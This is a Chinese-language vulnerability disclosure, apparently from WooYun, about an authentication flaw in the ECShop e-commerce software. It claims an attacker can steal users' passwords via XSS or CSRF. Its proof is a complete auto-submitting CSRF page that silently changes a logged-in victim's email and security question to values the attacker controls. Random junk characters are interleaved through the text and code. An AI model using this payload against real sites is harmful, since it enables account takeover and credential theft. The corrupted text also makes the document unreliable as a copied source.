简要描述:. |/ G) @1 Q! ~1 Z; N E
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
- W8 N1 k4 a% ]5 C6 G5 j# G+ L6 m% E( X; B- x6 V" g
Demo For:http://www.wooyun.org/bug.php?action=view&id=395% O4 i9 c6 T0 h2 t8 j
7 C+ R( W6 ^" I% U* ]1 i$ {详细说明:
* M7 H, L; b9 L" l6 g利用csrf和xss可以突破官方所说的“障碍”
, I- \) R w8 I" d- vxss版本已经有人说明
9 n& }5 { u% m3 p/ N' p这里给出csrf版本+ z6 u5 ? g5 X! G0 k3 p
, F d5 a2 G, y& [2 ?9 [. `- M漏洞证明:
2 }6 j) Y* @7 `, Q% H: b4 n, b<html>6 [* Y" m/ s) n
<body>) ~9 X1 L' D- q1 q1 \1 H5 z
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">& P+ Y1 f3 k# N# p! S# g' i
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">! r8 l/ a' X5 I7 Q0 I
<INPUT TYPE="text" NAME="act" value="act_edit_profile">; v- ~+ X3 Z9 E) S
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
% J% c8 s' q, P+ E<INPUT TYPE="text" NAME="passwd_answer" value="exploit">) b' @+ u4 z2 ]
</body>4 b" }, S0 N; U% f6 |8 X- L; k
<script>
7 z" o6 C: f. \6 `1 b9 [# w; f' Fdocument.forms[0].submit();
) }" v. K* s7 K</script>
, ?( |8 Q$ X9 ^6 K [</html>
6 D6 T I$ m k% C! v* Q% z构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失, K# d4 U) ^9 {0 P5 \
3 C( }3 o l u5 y |